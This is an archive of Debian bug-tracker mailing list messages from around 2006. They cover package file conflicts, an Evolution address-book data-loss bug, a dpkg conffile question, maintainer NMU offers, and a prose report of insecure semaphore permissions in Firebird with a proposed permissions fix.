Processing commands for [EMAIL PROTECTED]: reopen 361958 Bug#361958: modutils conflicts with manpages-dev. see Bug #360843 Bug reopened, originator not changed. severity 361958 serious Bug#361958: modutils conflicts with manpages-dev. see Bug #360843 Severity set to `serious'. reassign 361958 manpages-dev Bug#361958: modutils conflicts with manpages-dev. see Bug #360843 Bug reassigned from package `modutils' to `manpages-dev'. merge 361958 361369 Bug#361369: conflicting files with modutils Bug#361958: modutils conflicts with manpages-dev. see Bug #360843 Bug#360843: manpages-dev tries to overwrite files from modutils (create_module.2.gz) Bug#361084: package manpages-dev in unstable is broken Merged 360843 361084 361369 361958. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: should dpkg check for changed types of conffiles ?
Processing commands for [EMAIL PROTECTED]: clone 360673 -1 Bug#360673: lessdisks-terminal: purging removes /etc/mtab Bug 360673 cloned as bug 361996. severity -1 wishlist Bug#361996: lessdisks-terminal: purging removes /etc/mtab Severity set to `wishlist'. reassign -1 dpkg Bug#361996: lessdisks-terminal: purging removes /etc/mtab Bug reassigned from package `lessdisks-terminal' to `dpkg'. retitle -1 dpkg: should check for changed types of conffiles ? Bug#361996: lessdisks-terminal: purging removes /etc/mtab Changed Bug title. In #360673, a package included a symbolic link from /etc/mtab to Unknown command or malformed arguments to command. /proc/mounts. Installing the package causes /etc/mtab to be Unknown command or malformed arguments to command. overwritten, and purging the package causes it to be removed. I Unknown command or malformed arguments to command. reported it as a grave bug, since no package should overwriting or Unknown command or malformed arguments to command. removing a file that doesn't specifically belong to that package. Unknown command or malformed arguments to command. Too many unknown commands, stopping here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361995: evolution: Creating new address book creates only an alias, but deleting deletes the original folder
Package: evolution Version: 2.4.2.1-2 Severity: critical Justification: causes serious data loss X-Debbugs-Cc: [EMAIL PROTECTED] When I create a new address book, this only creates an alias to an exisiting one (the last in the list of those available - but tried only once). Deleting this new (alias) addressbook, however, does also delete the real data behind it. Trying to access the original folder result in the following error message: We were unable to open this addressbook. Please check that the path my-home/.evolution/addressbook/local exists and that you have permission to access it. Steps to reproduce: new - addressbook delete the new addressbook the content of the aliased folder will be lost Best regads Ben -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.15.6 Locale: LANG=en_GB.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_GB.UTF-8) Versions of packages evolution depends on: ii evolution-data-serve 1.4.2.1-2 evolution database backend server ii gconf2 2.14.0-1GNOME configuration database syste ii gnome-icon-theme 2.8.0-4 GNOME Desktop icon theme ii gtkhtml3.8 3.8.1-1.1 HTML rendering/editing library - b ii libart-2.0-2 2.3.17-1Library of functions for 2D graphi ii libatk1.0-0 1.10.1-2The ATK accessibility toolkit ii libaudiofile00.2.6-6 Open-source version of SGI's audio ii libavahi-client3 0.6.4-2 Avahi client library ii libavahi-common3 0.6.9-6 Avahi common library ii libavahi-compat-howl 0.6.9-6 Avahi Howl compatibility library ii libavahi-glib1 0.6.9-6 Avahi glib integration library ii libbonobo2-0 2.14.0-1Bonobo CORBA interfaces library ii libbonoboui2-0 2.8.1-2 The Bonobo UI library ii libc62.3.6-4 GNU C Library: Shared libraries an ii libcairo21.0.2-3 The Cairo 2D vector graphics libra ii libcamel1.2-61.4.2.1-1 The Evolution MIME message handlin ii libcomerr2 1.37-2 common error description library ii libdb4.2 4.2.52-18 Berkeley v4.2 Database Libraries [ ii libdbus-1-2 0.61-5 simple interprocess messaging syst ii libebook1.2-51.4.2.1-1 Client library for evolution addre ii libecal1.2-3 1.4.2.1-1 Client library for evolution calen ii libedataserver1.2-4 1.4.2.1-1 Utility library for evolution data ii libedataserverui1.2- 1.4.2.1-1 GUI utility library for evolution ii libesd-alsa0 [libesd 0.2.35-2Enlightened Sound Daemon (ALSA) - ii libfontconfig1 2.3.1-2 generic font configuration library ii libfreetype6 2.1.10-1FreeType 2 font engine, shared lib ii libgail-common 1.8.3-1 GNOME Accessibility Implementation ii libgail171.8.3-1 GNOME Accessibility Implementation ii libgconf2-4 2.14.0-1GNOME configuration database syste ii libgcrypt11 1.2.2-1 LGPL Crypto library - runtime libr ii libglade2-0 1:2.5.1-2 library to load .glade files at ru ii libglib2.0-0 2.10.1-2The GLib library of C routines ii libgnome-keyring00.4.3-1 GNOME keyring services library ii libgnome-pilot2 2.0.12-1.2 Support libraries for gnome-pilot ii libgnome2-0 2.8.1-2 The GNOME 2 library - runtime file ii libgnomecanvas2-02.12.0-1A powerful object-oriented display ii libgnomeprint2.2-0 2.12.1-2The GNOME 2.2 print architecture - ii libgnomeprintui2.2-0 2.12.1-1GNOME 2.2 print architecture User ii libgnomeui-0 2.8.1-3 The GNOME 2 libraries (User Interf ii libgnomevfs2-0 2.14.0-1GNOME virtual file-system (runtime ii libgnutls11 1.0.16-14 GNU TLS library - runtime library ii libgpg-error01.2-1 library for common error values an ii libgtk2.0-0 2.8.9-2 The GTK+ graphical user interface ii libgtkhtml3.8-15 3.8.1-1.1 HTML rendering/editing library - r ii libice6 4.3.0.dfsg.1-12.0.1 Inter-Client Exchange library ii libjpeg626b-10 The Independent JPEG Group's JPEG ii libkrb53 1.4.3-4 MIT Kerberos runtime libraries ii libldap2 2.1.30-6OpenLDAP libraries ii libnspr4 2:1.7.12-1.1Netscape Portable Runtime Library ii libnss3 2:1.7.12-1.1Network Security Service Libraries ii liborbit2
Bug#360673: should dpkg check for changed types of conffiles ?
clone 360673 -1 severity -1 wishlist reassign -1 dpkg retitle -1 dpkg: should check for changed types of conffiles ? In #360673, a package included a symbolic link from /etc/mtab to /proc/mounts. Installing the package causes /etc/mtab to be overwritten, and purging the package causes it to be removed. I reported it as a grave bug, since no package should overwriting or removing a file that doesn't specifically belong to that package. However, I wonder whether this exposes a bug that dpkg should handle better. Installing lessdisks-terminal didn't cause a conffile prompt (for me) presumably because [ md5sum(/proc/mtab) = md5sum(/etc/mtab.dpkg-new = /proc/mounts) ] I know that dpkg intentionally doesn't overwrite symlinks with directories and vice-versa, but I think that in this case (at least) I should have been prompted. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#350677: apr-util: Patch to force PIC generation
Vincent Danjean wrote: Here is a dpatch file to force the use of the -fPIC flags. Hi, Is there a problem with my patch ? There has been no information since my mail (and the initial bug report) for this bug. If I do not hear otherwise, I intend to NMU this package with my patch applied to close this RC-bug. Best regards, Vincent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#362001: [security] Insecure semaphore permissions
Package: libfbembed1 Version: 1.5.1-1 Severity: serious Tags: security patch upstream Hi, (The purpose of this bugreport is mainly to get it fixed in stable. Upload to unstable is pending.) This time the security-related bug in firebird2 is DoS. The classic flavour of the server (contained in libfbembed1) uses semaphore array for IPC and creates this array with world-writable permissions. This allows a local attacker to lock all semaphores in the array effectively blocking further requests. I post the bug in the BTS without privatelly discussion with the team, since the vulnerability is published in upstreams bugtracker[1]. [1] http://sourceforge.net/tracker/index.php?func=detailaid=1466193group_id=9028atid=593943 A fix to the vulnerability is to create semaphores with 0660 permissions. The patch to unstable package is in separate-file-and-sem-perms.dpatch[2]. Patch to stable package may be based on it (stable implements part of it). I can also prepare an interdiff for stable if you prefer. [2] http://svn.debian.org/wsvn/pkg-firebird/trunk/debian/patches/separate-file-and-sem-perms.dpatch?op=filerev=0sc=0 A note about Version: in stable the libfbembed1 package is named libfirebird2-classic. The vulnerability is present in all 1.5 versions. Ah, there is also one file created with 0666, but it is in /var/run/firebird2, which is accessable for firebird:firebird only and thus poses no threats. Please tell me if I can be of some help. Greetings, dam -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.13+reiser4+dam.1 Locale: LANG=bg_BG.UTF-8, LC_CTYPE=bg_BG.UTF-8 (charmap=UTF-8) Versions of packages libfbembed1 depends on: ii libc6 2.3.6-4GNU C Library: Shared libraries an ii libgcc1 1:4.1.0-1 GCC support library ii libncurses5 5.5-1 Shared libraries for terminal hand ii libstdc++64.1.0-1The GNU Standard C++ Library v3 libfbembed1 recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#321057: intend to NMU
Hi again, since you've not responded to my NMU offer one month ago, I'd like to offer the NMU again. I see that you're (like me) not (yet) a DD, so you can't upload this fix yourself. If you need a sponsor, my AM offered to sponsor this upload for you. Please drop me a note if you'd like to take this offer. Kind regards, Bastian -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#360843: manpages-dev still tries to overwrite files from modutils
Package: manpages-dev Version: 2.25-2 Followup-For: Bug #360843 Manpages-dev is still uninstallable: Unpacking replacement manpages-dev ... dpkg: error processing /var/cache/apt/archives/manpages-dev_2.25-2_all.deb (--unpack): trying to overwrite `/usr/share/man/man2/create_module.2.gz', which is also in package modutils BTW, what is the correct way of reporting bugs for packages that are not installable? What version should I put in the bugreport? The version of the new package, that doesn't install, or the version I have currently installed, and can't upgrade from it? (I used the new version) -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: amd64 (x86_64) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-1-amd64-k8 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Versions of packages manpages-dev depends on: ii manpages 2.25-2 Manual pages about using a GNU/Lin manpages-dev recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]